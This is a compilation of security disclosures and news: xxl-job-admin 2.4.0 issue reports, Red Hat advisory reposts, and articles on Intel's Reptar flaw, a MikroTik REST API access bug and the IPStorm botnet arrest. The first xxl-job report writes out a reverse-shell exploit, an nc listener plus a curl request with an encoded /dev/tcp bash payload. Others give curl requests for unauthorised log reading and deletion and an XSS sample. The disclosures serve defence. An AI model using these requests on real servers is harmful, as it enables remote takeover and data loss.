xxl-job-admin 2.4.0 is vulnerable to Remote Code Execution (RCE) via /xxl-job-admin/jobcode/save.

**Environment**

MySQL 5.7.44, XXL-Job-Admin 2.4.0  
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)  
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

**Vulnerability Information**

It was found that the /xxl-job-admin/jobcode/save does not validate user privilege. The modification of code in running cronjob for job executor does not require privileged user access. By leveraging the vulnerability, users could craft HTTP requests to modify and run arbitrary code (e.g., sensitive information disclosure OR reverse shell) on the job executor.

**Steps to reproduce the behavior**

Step 1: Create a listener  
nc -nlvp 8888  

Step 2: Create a unprivileged user and get its cookie  
  

Step 3: Craft an HTTP request for job code saving. This demonstration will be a reverse shell payload.  
curl http://<IP Address>:<Port>/xxl-job-admin/jobcode/save --cookie "xxljob_adminlte_settings=on; XXL_JOB_LOGIN_IDENTITY=<Unprivileged Cookie>" -d "id=2&glueSource=%23%2Fbin%2Fbash%0Abash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<Reverse shell IP>%2F<Reverse shell port>%200%3E%261&glueRemark=Test"  

Step 4. Trigger the cronjob/wait until cronjob executes. A reverse shell will be executed.

CVE-2023-48089: Remote Code Execution in /xxl-job-admin/jobcode/save · Issue #3333 · xuxueli/xxl-job

xxl-job-admin 2.4.0 is vulnerable to Insecure Permissions via /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailCat.

**Environment**

MySQL 5.7.44, XXL-Job-Admin 2.4.0  
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)  
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

**Vulnerability Information**

It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validate user privilege and induces risk of sensitive information leakage and loss.

**Steps to reproduce the behavior**

Step 1: Create a normal user without any privilege inside the web console as below  

Step 2: Retrieve the cookie for the user  

Step 3: Run the following command for testing log query  
 curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'  
  
It can show the successful log query and return 200 status.

Step 4: Run the following command for log clearing  
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'  
  
it will return 200 status.

Step 5. Show the log in the console. It will show that all log is cleared successfully by normal user.

CVE-2023-48087: Permission Vulnerability of Path /xxl-job-admin/joblog/clearLog & /xxl-job-admin/joblog/logDetailCat · Issue #3330 · xuxueli/xxl-job

xxl-job-admin 2.4.0 is vulnerable to Cross Site Scripting (XSS) via /xxl-job-admin/joblog/logDetailPage.

**Environment**

MySQL 5.7.44, XXL-Job-Admin 2.4.0  
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)  
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

**Vulnerability Information**

During the query of /xxl-job-admin/joblog/logDetailPage, the xxl-job-admin will query the related log directly in the machine and show it in the console in HTML format even if the log appears in <script> </script> format

**Steps to reproduce the behavior**

Step 1: Modify the application log in default path of XXL-Job-Executor and add malicious javascript  
 cd /data/applogs/xxl-job/jobhandler/yyyy-mm-dd/  
  
Example malicious code  
<script>alert(Test123);</script>  

Step 2: Login to the XXL-Job-Admin console by admin user and navigate to Log Query Page  
Check the log by querying log id  

Step 3: Alert will show here

CVE-2023-48088: XSS attack appears in /xxl-job-admin/joblog/logDetailPage · Issue #3329 · xuxueli/xxl-job

Red Hat Security Advisory 2023-7139-01 - An update for samba, evolution-mapi, and openchangeis now available for Red Hat Enterprise Linux 8. Issues addressed include out of bounds read and path disclosure vulnerabilities.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7139.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: samba security, bug fix, and enhancement updateAdvisory ID:        RHSA-2023:7139-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7139Issue date:         2023-11-14Revision:           01CVE Names:          CVE-2022-2127====================================================================Summary: An update for samba, evolution-mapi, and openchangeis now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Samba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.The following packages have been upgraded to a later upstream version: samba (4.18.6). (BZ#2190417)Security Fix(es):* samba: out-of-bounds read in winbind AUTH_CRAP (CVE-2022-2127)* samba: infinite loop in mdssvc RPC service for spotlight (CVE-2023-34966)* samba: type confusion in mdssvc RPC service for spotlight (CVE-2023-34967)* samba: spotlight server-side share path disclosure (CVE-2023-34968)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.9 Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-2127References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.9_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2175385https://bugzilla.redhat.com/show_bug.cgi?id=2190417https://bugzilla.redhat.com/show_bug.cgi?id=2218237https://bugzilla.redhat.com/show_bug.cgi?id=2221594https://bugzilla.redhat.com/show_bug.cgi?id=2221600https://bugzilla.redhat.com/show_bug.cgi?id=2222791https://bugzilla.redhat.com/show_bug.cgi?id=2222793https://bugzilla.redhat.com/show_bug.cgi?id=2222794https://bugzilla.redhat.com/show_bug.cgi?id=2222795https://bugzilla.redhat.com/show_bug.cgi?id=2222884https://bugzilla.redhat.com/show_bug.cgi?id=2232564

Red Hat Security Advisory 2023-7139-01

Red Hat Security Advisory 2023-7083-01 - An update for emacs is now available for Red Hat Enterprise Linux 8. Issues addressed include a code execution vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7083.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: emacs security updateAdvisory ID:        RHSA-2023:7083-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7083Issue date:         2023-11-14Revision:           01CVE Names:          CVE-2022-48337====================================================================Summary: An update for emacs is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language (elisp), and the capability to read e-mail and news.Security Fix(es):* emacs: command execution via shell metacharacters (CVE-2022-48337)* emacs: command injection vulnerability in htmlfontify.el (CVE-2022-48339)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.9 Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-48337References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.9_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2171987https://bugzilla.redhat.com/show_bug.cgi?id=2171989

Red Hat Security Advisory 2023-7083-01

Red Hat Security Advisory 2023-7077-01 - An update for kernel is now available for Red Hat Enterprise Linux 8. Issues addressed include buffer overflow, denial of service, double free, information leakage, memory leak, null pointer, out of bounds access, out of bounds write, and use-after-free vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7077.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security, bug fix, and enhancement update  
Advisory ID:        RHSA-2023:7077-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7077  
Issue date:         2023-11-14  
Revision:           01  
CVE Names:          CVE-2021-43975  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: tun: avoid double free in tun_free_netdev (CVE-2022-4744)

* kernel: net/sched: multiple vulnerabilities (CVE-2023-3609, CVE-2023-3611, CVE-2023-4128, CVE-2023-4206, CVE-2023-4207, CVE-2023-4208)

* kernel: out-of-bounds write in qfq_change_class function (CVE-2023-31436)

* kernel: out-of-bounds write in hw_atl_utils_fw_rpc_wait (CVE-2021-43975)

* kernel: Rate limit overflow messages in r8152 in intr_callback (CVE-2022-3594)

* kernel: use after free flaw in l2cap_conn_del (CVE-2022-3640)

* kernel: double free in usb_8dev_start_xmit (CVE-2022-28388)

* kernel: vmwgfx: multiple vulnerabilities (CVE-2022-38457, CVE-2022-40133, CVE-2023-33951, CVE-2023-33952)

* hw: Intel: Gather Data Sampling (GDS) side channel vulnerability (CVE-2022-40982)

* kernel: Information leak in l2cap_parse_conf_req (CVE-2022-42895)

* kernel: KVM: multiple vulnerabilities (CVE-2022-45869, CVE-2023-4155, CVE-2023-30456)

* kernel: memory leak in ttusb_dec_exit_dvb (CVE-2022-45887)

* kernel: speculative pointer dereference in do_prlimit (CVE-2023-0458)

* kernel: use-after-free due to race condition in qdisc_graft (CVE-2023-0590)

* kernel: x86/mm: Randomize per-cpu entry area (CVE-2023-0597)

* kernel: HID: check empty report_list in hid_validate_values (CVE-2023-1073)

* kernel: sctp: fail if no bound addresses can be used for a given scope (CVE-2023-1074)

* kernel: hid: Use After Free in asus_remove (CVE-2023-1079)

* kernel: use-after-free in drivers/media/rc/ene_ir.c (CVE-2023-1118)

* kernel: hash collisions in the IPv6 connection lookup table (CVE-2023-1206)

* kernel: ovl: fix use after free in struct ovl_aio_req (CVE-2023-1252)

* kernel: denial of service in tipc_conn_close (CVE-2023-1382)

* kernel: Use after free bug in btsdio_remove due to race condition (CVE-2023-1989)

* kernel: Spectre v2 SMT mitigations problem (CVE-2023-1998)

* kernel: ext4: use-after-free in ext4_xattr_set_entry (CVE-2023-2513)

* kernel: fbcon: shift-out-of-bounds in fbcon_set_font (CVE-2023-3161)

* kernel: out-of-bounds access in relay_file_read (CVE-2023-3268)

* kernel: xfrm: NULL pointer dereference in xfrm_update_ae_params (CVE-2023-3772)

* kernel: smsusb: use-after-free caused by do_submit_urb (CVE-2023-4132)

* kernel: Race between task migrating pages and another task calling exit_mmap (CVE-2023-4732)

* Kernel: denial of service in atm_tc_enqueue due to type confusion (CVE-2023-23455)

* kernel: mpls: double free on sysctl allocation failure (CVE-2023-26545)

* kernel: Denial of service issue in az6027 driver (CVE-2023-28328)

* kernel: lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow (CVE-2023-28772)

* kernel: blocking operation in dvb_frontend_get_event and wait_event_interruptible (CVE-2023-31084)

* kernel: net: qcom/emac: race condition leading to use-after-free in emac_remove (CVE-2023-33203)

* kernel: saa7134: race condition leading to use-after-free in saa7134_finidev (CVE-2023-35823)

* kernel: dm1105: race condition leading to use-after-free in dm1105_remove.c (CVE-2023-35824)

* kernel: r592: race condition leading to use-after-free in r592_remove (CVE-2023-35825)

* kernel: net/tls: tls_is_tx_ready() checked list_entry (CVE-2023-1075)

* kernel: use-after-free bug in remove function xgene_hwmon_remove (CVE-2023-1855)

* kernel: Use after free bug in r592_remove (CVE-2023-3141)

* kernel: gfs2: NULL pointer dereference in gfs2_evict_inode (CVE-2023-3212)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.9 Release Notes linked from the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-43975

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.9_release_notes/index  
https://access.redhat.com/solutions/7027704  
https://bugzilla.redhat.com/show_bug.cgi?id=1975026  
https://bugzilla.redhat.com/show_bug.cgi?id=2024989  
https://bugzilla.redhat.com/show_bug.cgi?id=2037005  
https://bugzilla.redhat.com/show_bug.cgi?id=2073091  
https://bugzilla.redhat.com/show_bug.cgi?id=2112147  
https://bugzilla.redhat.com/show_bug.cgi?id=2133453  
https://bugzilla.redhat.com/show_bug.cgi?id=2133455  
https://bugzilla.redhat.com/show_bug.cgi?id=2139610  
https://bugzilla.redhat.com/show_bug.cgi?id=2147356  
https://bugzilla.redhat.com/show_bug.cgi?id=2148520  
https://bugzilla.redhat.com/show_bug.cgi?id=2149024  
https://bugzilla.redhat.com/show_bug.cgi?id=2151112  
https://bugzilla.redhat.com/show_bug.cgi?id=2151317  
https://bugzilla.redhat.com/show_bug.cgi?id=2156322  
https://bugzilla.redhat.com/show_bug.cgi?id=2165741  
https://bugzilla.redhat.com/show_bug.cgi?id=2165926  
https://bugzilla.redhat.com/show_bug.cgi?id=2166567  
https://bugzilla.redhat.com/show_bug.cgi?id=2168332  
https://bugzilla.redhat.com/show_bug.cgi?id=2173403  
https://bugzilla.redhat.com/show_bug.cgi?id=2173430  
https://bugzilla.redhat.com/show_bug.cgi?id=2173434  
https://bugzilla.redhat.com/show_bug.cgi?id=2173444  
https://bugzilla.redhat.com/show_bug.cgi?id=2174220  
https://bugzilla.redhat.com/show_bug.cgi?id=2174400  
https://bugzilla.redhat.com/show_bug.cgi?id=2175160  
https://bugzilla.redhat.com/show_bug.cgi?id=2175322  
https://bugzilla.redhat.com/show_bug.cgi?id=2175903  
https://bugzilla.redhat.com/show_bug.cgi?id=2176140  
https://bugzilla.redhat.com/show_bug.cgi?id=2177371  
https://bugzilla.redhat.com/show_bug.cgi?id=2177389  
https://bugzilla.redhat.com/show_bug.cgi?id=2178301  
https://bugzilla.redhat.com/show_bug.cgi?id=2181273  
https://bugzilla.redhat.com/show_bug.cgi?id=2181330  
https://bugzilla.redhat.com/show_bug.cgi?id=2182443  
https://bugzilla.redhat.com/show_bug.cgi?id=2183559  
https://bugzilla.redhat.com/show_bug.cgi?id=2184578  
https://bugzilla.redhat.com/show_bug.cgi?id=2185945  
https://bugzilla.redhat.com/show_bug.cgi?id=2186948  
https://bugzilla.redhat.com/show_bug.cgi?id=2187257  
https://bugzilla.redhat.com/show_bug.cgi?id=2188468  
https://bugzilla.redhat.com/show_bug.cgi?id=2189324  
https://bugzilla.redhat.com/show_bug.cgi?id=2192667  
https://bugzilla.redhat.com/show_bug.cgi?id=2192671  
https://bugzilla.redhat.com/show_bug.cgi?id=2193097  
https://bugzilla.redhat.com/show_bug.cgi?id=2193219  
https://bugzilla.redhat.com/show_bug.cgi?id=2209710  
https://bugzilla.redhat.com/show_bug.cgi?id=2213139  
https://bugzilla.redhat.com/show_bug.cgi?id=2213199  
https://bugzilla.redhat.com/show_bug.cgi?id=2213485  
https://bugzilla.redhat.com/show_bug.cgi?id=2213802  
https://bugzilla.redhat.com/show_bug.cgi?id=2214348  
https://bugzilla.redhat.com/show_bug.cgi?id=2215502  
https://bugzilla.redhat.com/show_bug.cgi?id=2215835  
https://bugzilla.redhat.com/show_bug.cgi?id=2215836  
https://bugzilla.redhat.com/show_bug.cgi?id=2215837  
https://bugzilla.redhat.com/show_bug.cgi?id=2217658  
https://bugzilla.redhat.com/show_bug.cgi?id=2218195  
https://bugzilla.redhat.com/show_bug.cgi?id=2218212  
https://bugzilla.redhat.com/show_bug.cgi?id=2218943  
https://bugzilla.redhat.com/show_bug.cgi?id=2221707  
https://bugzilla.redhat.com/show_bug.cgi?id=2223949  
https://bugzilla.redhat.com/show_bug.cgi?id=2225191  
https://bugzilla.redhat.com/show_bug.cgi?id=2225201  
https://bugzilla.redhat.com/show_bug.cgi?id=2225511  
https://bugzilla.redhat.com/show_bug.cgi?id=2230213  
https://bugzilla.redhat.com/show_bug.cgi?id=2236982  
https://issues.redhat.com/browse/RHEL-340

Red Hat Security Advisory 2023-7077-01

Intel has released fixes to close out a high-severity flaw codenamed Reptar that impacts its desktop, mobile, and server CPUs.
Tracked as CVE-2023-23583 (CVSS score: 8.8), the issue has the potential to "allow escalation of privilege and/or information disclosure and/or denial of service via local access."
Successful exploitation of the vulnerability could also permit a bypass of the CPU's

Vulnerability / Hardware Security

Intel has released fixes to close out a high-severity flaw codenamed **Reptar** that impacts its desktop, mobile, and server CPUs.

Tracked as **CVE-2023-23583** (CVSS score: 8.8), the issue has the potential to "allow escalation of privilege and/or information disclosure and/or denial of service via local access."

Successful exploitation of the vulnerability could also permit a bypass of the CPU's security boundaries, according to Google Cloud, describing it as an issue stemming from how redundant prefixes are interpreted by the processor.

"The impact of this vulnerability is demonstrated when exploited by an attacker in a multi-tenant virtualized environment, as the exploit on a guest machine causes the host machine to crash resulting in a Denial of Service to other guest machines running on the same host," Google Cloud's Phil Venables said.

"Additionally, the vulnerability could potentially lead to information disclosure or privilege escalation."

Security researcher Tavis Normandy, in a separate analysis of Reptar, said it can be abused to corrupt the system state and force a machine-check exception.

Intel, as part of November 2023 updates, has published updated microcode for all affected processors. The complete list of Intel CPUs impacted by CVE-2023-23583 is available here. There is no evidence of any active attacks using this vulnerability.

"Intel does not expect this issue to be encountered by any non-malicious real-world software," the company said in a guidance issued on November 14. "Malicious exploitation of this issue requires execution of arbitrary code."

The disclosure coincides with the release of patches for a security flaw in AMD processors called CacheWarp (CVE-2023-20592) that lets malicious actors break into AMD SEV-protected VMs to escalate privileges and gain remote code execution.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Reptar: New Intel CPU Vulnerability Impacts Multi-Tenant Virtualized Environments

Multiple heap-based buffer overflow vulnerabilities exist in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier. If a user opens a specially crafted VPR file, information may be disclosed and/or arbitrary code may be executed.

**The latest TELLUS and V-Server Improvement information**

Improvement information Improvement information list

TELLUS

  

Ver.4.0.17.0 → Ver.4.0.19.0

**Date of Release**

2023/11/2

  

No.

Item

Description

Altered  
Ver.

23B0Q01

Communication error

Fixed the defect: When \[Comm. Error Handling\] is set to \[Stop\] and a communication error occurs, clicking \[Retry\] may cause TELLUS to forcibly terminate or freeze.

23B0Q02

Interval timer macro command

Fixed the defect: When the interval timer macro command is constantly running at a cycle of 100 msec or lower, TELLUS may freeze at a rare timing.

23B0Q03

Improvement of vulnerability

Fixed the defect: When a corrupted screen program is opened using TELLUS Ver. 4, the Tellus4.exe file and simulator (VS6Sim.exe) are terminated due to an error.  
(Observed vulnerability of TELLUS Ver. 4: JVNVU#93840158)

V-Server

  

Ver.4.0.18.0 → Ver.4.0.19.0

**Date of Release**

2023/11/2

  

No.

Item

Description

Altered  
Ver.

23B0S01

Loading recipes

Fixed the defect: V-Server may be forcibly terminated if loading of a recipe is executed.

23B0S02

Improvement of vulnerability

Fixed the defect: When a corrupted screen program is opened using V-Server Ver. 4, the Vserver.exe file is terminated due to an error.  
(Observed vulnerability of V-Server Ver. 4: JVNVU#93840158)

CVE-2023-47586: Improvement information | Hakko Electronics Co., Ltd.

MikroTik RouterOS v7.1 to 7.11 was discovered to contain incorrect access control mechanisms in place for the Rest API.

Recently, Mikrotik added a REST server as a new API for managing the router. It is a nice alternative to their proprietary API when automating RouterOS.

However, young software usually contains bugs. Sometimes, these bugs are security-related, and, together with not-so-safe defaults, they may create a vulnerability.

This vulnerability has been assigned the ID CVE-2023-41570.

**Background**

RouterOS (from Mikrotik) is a closed-source Linux-based operating system for network appliances, specifically switches, routers and firewalls. It is used in Mikrotik appliances (such as RouterBOARD), but it can be downloaded and installed on other devices and virtual machines.

The management interfaces of RouterOS include SSH, MAC-Telnet, Winbox (a proprietary Windows-only tool), Webfig (a web user interface), and a proprietary API (additionally, ISPs have also TR-069). Since version v7.1beta4, RouterOS also includes a REST server. The REST server is started as a sub-resource of Webfig at /rest. More information on the RouterOS REST API web page.

**Authentication**

RouterOS supports local and remote user authentication and authorization databases (via RADIUS). Users belong to _groups_, each with its own permissions set. The resulting permission set is additive – it is the sum of all permissions granted by groups.

By default, only the local database is used, and three groups are present: full, with unlimited access to the router; write, with almost complete access except for file transfer (to/from the router itself) and user policies, and read, with read-only access (plus reboot privileges). Also, by default, rest-api is a specific permission granted to all groups.

Users may be restricted to logging in only from specific IP addresses or networks.

**The vulnerability**

REST APIs are protected by HTTP Basic authentication. You should provide a valid username and password pair. The username must have the rest-api (which, by default, is granted to all groups).

The vulnerability lies in the fact that, while other interfaces (SSH, Webfig, etc.) check whether the user is authorized to log in from that specific IP address, this is not the case for the REST server. **Users can access the REST server from any IP address**, even if they are not authorized in the users’ database.

To exploit this vulnerability:

*   the attacker must have a username and password pair that has rest-api permission (but no permission to log in from the attacker IP address);
*   the firewall should allow access to the web user interface from the IP address of the attacker;
*   Webfig (the web UI) must be enabled: the REST server is part of Webfig.

Note that, by default, all groups have the rest-api permission (any user is allowed to use REST APIs), and Webfig is enabled. There is no way to disable the REST server, as it is integrated into Webfig. This is unexpected; usually, services like SSH or proprietary APIs are under the “IP” -> “Services” menu with their independent entry. At the very least, there should be a flag in the Webfig service www to enable the REST server selectively (defaulting off).

So, I think the majority of those who left Webfig active don’t realize that they are exposing the REST endpoint too, and that every user can access it, regardless of the IP filter configured in the user database.

To exacerbate the problem, the read group has some dangerous permissions: sniff (to intercept traffic), reboot, and sensitive (read sensitive information, such as Wi-Fi passwords or IPSec pre-shared keys). I certainly do not expect a “read” user to reboot the router.

**Mikrotik advisory and solution**

Mikrotik released RouterOS version 7.12 with the fix (the changelog contains only a generic reference to “www - fixed allowed address setting for REST API users”).

**Timeline**

I followed the responsible disclosure process described in the “Responsible disclosure of discovered vulnerabilities” page. I reported the vulnerability at 2023-08-19 09:46:00 UTC and received the ACK at 2023-08-24 07:43:00 UTC. The fix was released in version 7.12 at 2023-11-09 09:45:00 UTC (time point from RouterOS changelog).

CVE-2023-41570: CVE-2023-41570: Access Control vulnerability in MikroTik REST API

By Waqas
The FBI arrested the operator of the IPStorm botnet, a Russian-Moldovan national, in Spain.
This is a post from HackRead.com Read the original post: Operator of Major Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US

The IPStorm botnet targeted Windows, Linux, Mac, and Android devices and claimed victims in Asia, Europe, North America, and South America.

A Russian-Moldovan national has pleaded guilty to operating an illegal botnet proxy service called IPStorm, responsible for infecting thousands of internet-connected devices worldwide.

Sergei Makinin, 32, of Moscow, Russia, was arrested by the F.B.I. with the cooperation of law enforcement authorities in Spain and Bitdefender, which provided cybersecurity consulting, resources, and guidance to track the suspect.

Makinin pleaded guilty to “three counts of violating 18 U.S.C. § 1030(a)(5)(A) Fraud and Related Activity in Connection with Computers,” in a district court in Puerto Rico as per the U.S. Department of Justice press release.

Makinin was suspected of running an extensive botnet-for-rent operation called Interplanetary Storm (IPStorm) used for illegal activities from June 2019 through December 2022. Bitdefender first documented the operation in a research paper in October 2020.

The botnet targeted Windows, Linux, Mac, and Android devices and claimed victims in Asia, Europe, North America, and South America. IPStorm anonymized its users’ internet traffic, allowing them to conduct malicious activities such as hacking, identity theft, and fraud.

Countries targeted by IPStorm botnet based on the number of victims (Credit: Bitdefender)

In his guilty plea, Makinin admitted that he and his accomplices ran IPStorm from 2015 to 2019 and successfully compromised over 40,000 devices using the IPStorm malware and 23,000 “highly anonymous” proxies. The domains used by Makinin is the scam were proxx.io and proxx.net.

The IPStorm malware allowed Makinin hijack the devices and use them as a proxy. Cybercriminals preferred the service because it was inexpensive, easy to use, and effectively anonymized their internet traffic. Makinin also admitted to developing/distributing malware for infecting the devices, earning $550,0000, and laundering the money.

Makinin is the first to be charged in connection with IPStorm. He faces up to 10 years in prison and will have to forfeit the cryptocurrency wallets linked with the scam. The sentencing is yet to be scheduled. Meanwhile, the F.B.I. and DoJ will continue to investigate the service.

Prices offered by Makinin (Screenshot credit: Hackread.com)

Commenting on this development is the operation’s lead researcher and Bitdefender’s Investigation and Forensics Unit’s senior director, Alexandru Catalin Cosoi. Cosoi shared with Hackread.com that IPStorm was a “complex” botnet rented by cybercriminals for various nefarious activities:

“The Interplanetary Storm botnet was complex and used to power various cybercriminal activities by renting it as a proxy as a service system over infected IoT devices. Our initial research back in 2020 uncovered valuable clues to the culprit behind its operation, and we are extremely pleased it helped lead to arrests,” Cosio explained.

“This investigation is another primary example of law enforcement and the private cybersecurity sector working together to shut down illegal online activities and bring those responsible to justice.”

Makinin’s conviction is a significant victory for law enforcement in the fight against cybercrime. Botnet proxy services remain a serious threat because they are used to committing cybercrimes. This development sends a strong message to other cybercriminals that they will be held accountable for their actions sooner or later.

****_RELATED ARTICLES_****

1.  **Russian Cybercriminal Pleads Guilty to Operating Kelihos Botnet**
2.  **Man whose DDoS attacks took down entire country’s Internet jailed**
3.  **Luminosity RAT author pleads guilty to creating, selling hacking tool**
4.  **2 Russians charged in Mt. Gox Bitcoin heist, BTC-e money laundering**
5.  **No Prison for Student who Developed Spam Botnet to Pay College Fee**

Tag

#mac